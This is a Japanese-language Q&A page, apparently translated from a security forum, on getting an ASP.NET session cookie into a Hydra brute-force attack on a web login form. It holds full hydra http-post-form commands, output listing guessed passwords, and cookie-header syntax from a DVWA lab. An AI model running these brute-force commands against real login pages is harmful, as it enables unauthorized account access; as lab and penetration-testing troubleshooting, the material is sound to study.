web-dev-qa-db-ja.com

aspxサイトからcookieを取得してhydraで使用する方法

Hydraと.aspxのサイトをいじってみましたが、ちょっとした問題が発生しました。Hydraが応答して、パスワードリストの最初の16個のパスワードが正しくない場合に正しいと通知します。

構文:

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

出力

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] Host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] Host: 192.168.88.196   login: admin   password: adrian

[80][www-form] Host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] Host: 192.168.88.196   login: admin   password: academic

[80][www-form] Host: 192.168.88.196   login: admin   password: access

[80][www-form] Host: 192.168.88.196   login: admin   password: abc

[80][www-form] Host: 192.168.88.196   login: admin   password: admin

[80][www-form] Host: 192.168.88.196   login: admin   password: academia

[80][www-form] Host: 192.168.88.196   login: admin   password: albatross

[80][www-form] Host: 192.168.88.196   login: admin   password: alex

[80][www-form] Host: 192.168.88.196   login: admin   password: airplane

[80][www-form] Host: 192.168.88.196   login: admin   password: albany

[80][www-form] Host: 192.168.88.196   login: admin   password: ada

[80][www-form] Host: 192.168.88.196   login: admin   password: aaa

[80][www-form] Host: 192.168.88.196   login: admin   password: albert

[80][www-form] Host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

私たちはヒドラにクッキーを追加できることを読みました:"H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. どのようにしてaspxからクッキーを取得しますか?
  2. それをヒドラにどのように提供しますか?
authenticationpasswordspenetration-testbrute-forcepassword-cracking
4
user3306821

Firefoxで Cookies Manager Plus などのブラウザプラグインを使用すると、値をクリップボードにコピーできます。

あなたが言うように、Hydraのコマンドラインに値を貼り付けるだけです。

ここで私の答えを参照してください 私のために働いた構文について。

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

したがって、PHPSESSIDと値の代わりに、ASP.NETセッションIDの名前と値を含めます。

4
SilverlightFox